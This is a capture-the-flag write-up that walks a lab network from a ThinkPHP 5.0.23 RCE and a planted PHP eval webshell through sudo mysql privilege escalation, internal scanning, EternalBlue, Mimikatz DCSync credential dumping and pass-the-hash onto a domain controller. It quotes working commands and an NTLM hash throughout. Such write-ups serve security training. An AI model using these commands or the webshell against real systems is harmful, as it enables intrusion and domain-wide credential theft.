This comprehensive writeup documents the complete penetration testing process for the Chunqiu Yunjing Initial CTF challenge, covering the entire attack chain from initial reconnaissance through domain controller compromise.

Target Environment Information

The challenge provides a simulated professional scenario with the following target IP: 39.99.151.82. It's worth noting that the target IP may vary depending on when the challenge environment is instantiated, though the internal network addressing remains consistent across deployments.

Phase 1: Information Gathering

Port Scanning and Service Enumeration

Using Rustscan combined with Nmap for comprehensive TCP port scanning with service fingerprinting and OS detection:

sudo rustscan -a 39.99.151.82 -r 1-65535 -- -sV -O -Pn -n -oA 39.99.151.82_TCP_Ports

Results revealed two open ports:

  • Port 22: OpenSSH 8.2p1 Ubuntu 4ubuntu0.5
  • Port 80: Apache httpd 2.4.41 (Ubuntu)

The service fingerprints clearly indicate an Ubuntu-based operating system. A supplementary UDP scan of the top 20 high-value ports showed all ports in "open|filtered" state, deprioritizing UDP enumeration for later phases.

Web Application Analysis

Fake Login Interface

Browser access to port 80 revealed a login interface with incomplete functionality. Testing showed that any username/password combination redirected to a non-existent /login.hrml page, and the registration feature was completely non-functional.

Examining the page source code exposed a critical piece of information in the comments: a backend port reference at http://localhost:8080/powers/pow/regUsers. Direct access attempts to this endpoint from outside failed, indicating it was only accessible from the internal network.

Directory Enumeration

Directory brute-forcing with ffuf uncovered several interesting paths:

  • robots.txt - Contained no useful restrictions
  • static/ - Directory with directory traversal vulnerability but no valuable content
  • router.php - A backend API routing mechanism

Parameter brute-forcing on router.php (both GET and POST methods) yielded no results, suggesting custom parameter naming.

Framework Identification

The website's favicon appeared familiar, suggesting a common framework. Calculating the mmh3 hash of the favicon.ico:

import mmh3
import base64
import requests

resp = requests.get('http://39.99.151.82/favicon.ico')
hash = mmh3.hash(base64.encodebytes(resp.content))
print(hash)  # Output: 1165838194

Using observer_ward for fingerprinting confirmed the target was running ThinkPHP. Triggering an error page by submitting invalid input revealed the version: ThinkPHP V5.0.23.

Phase 2: Initial Compromise

Exploiting ThinkPHP RCE

Searching for known vulnerabilities in ThinkPHP 5.0.23 led to the Vulhub RCE exploit. Testing the payload confirmed successful remote code execution.

Webshell Deployment

After confirming the current working directory as /var/www/html/, a simple PHP webshell was deployed:

echo '<?php @eval($_REQUEST["x"]);?>' > /var/www/html/shell.php

Note: Single quotes are essential here to prevent shell variable expansion. Using double quotes would cause the shell to interpret $_REQUEST as a variable, resulting in errors.

AntSword Connection

Connecting with AntSword using:

Initial reconnaissance from the webshell revealed:

  • Internal IP: 172.22.1.15
  • Internal network: 172.22.0.0/16
  • Hostname: ubuntu-web01
  • Architecture: x86_64

Privilege Escalation

Running sudo -l revealed a critical misconfiguration: the www-data user could execute /usr/bin/mysql as root without a password. Using GTFOBins, privilege escalation was achieved:

sudo /usr/bin/mysql -e '\! whoami'  # Confirmed root execution

Phase 3: Internal Network Reconnaissance

Fscan Deployment

After uploading Fscan to the compromised host (via a VPS reverse proxy due to network constraints), a comprehensive internal network scan was executed:

./fscan -h 172.22.0.0/16

Scan results identified five live hosts:

  • 172.22.1.2 (DC01 - Domain Controller, Windows Server 2016)
  • 172.22.1.15 (Compromised Ubuntu host)
  • 172.22.1.18 (XIAORANG-OA01, Windows Server 2012 R2, running OA system)
  • 172.22.1.21 (XIAORANG-WIN7, Windows Server 2008 R2)
  • 172.22.255.253 (Gateway)

Critical finding: 172.22.1.21 was vulnerable to MS17-010 (EternalBlue).

Establishing Persistence and Routing

Setting up internal network routing through Meterpreter:

run autoroute -s 172.22.0.0/16
use auxiliary/server/socks_proxy  # SOCKS5 proxy on port 1080

Phase 4: Lateral Movement

Exploiting MS17-010

Using the EternalBlue module against 172.22.1.21:

use windows/smb/ms17_010_eternalblue
set payload payload/windows/x64/meterpreter/bind_tcp
set RHOST 172.22.1.21

Successful exploitation granted SYSTEM-level access immediately.

Credential Harvesting

Loading Mimikatz (kiwi extension) and dumping credentials:

load kiwi
creds_all

DCSync attack to harvest domain credentials:

kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv"

This successfully extracted NTLM hashes for all domain users, including:

  • krbtgt
  • Administrator: 10cf89a850fb1cdbe6bb432b859164c8
  • Domain machine accounts

Phase 5: Domain Controller Compromise

Using the harvested Administrator hash to access the domain controller (172.22.1.2):

proxychains python3 /usr/share/doc/python3-impacket/examples/wmiexec.py xiaorang.lab/administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8

Searching for flags revealed this was flag 03 (the final flag). Additional flags were located on:

  • The initial Ubuntu web server (flag 01)
  • The OA server at 172.22.1.18 (flag 02)

Alternative Attack Path

An alternative exploitation path existed through the Xinhu OA system on 172.22.1.18. After brute-forcing the admin credentials (admin/admin123), an unauthorized file upload vulnerability could be exploited combined with a file extension bypass technique to achieve SYSTEM-level access.

Conclusion

This challenge demonstrated a complete attack chain from initial web application compromise through full domain domination, highlighting the importance of:

  • Keeping frameworks updated (ThinkPHP RCE)
  • Restricting sudo permissions (mysql privilege escalation)
  • Patching SMB vulnerabilities (MS17-010)
  • Implementing proper credential protection (DCSync attack)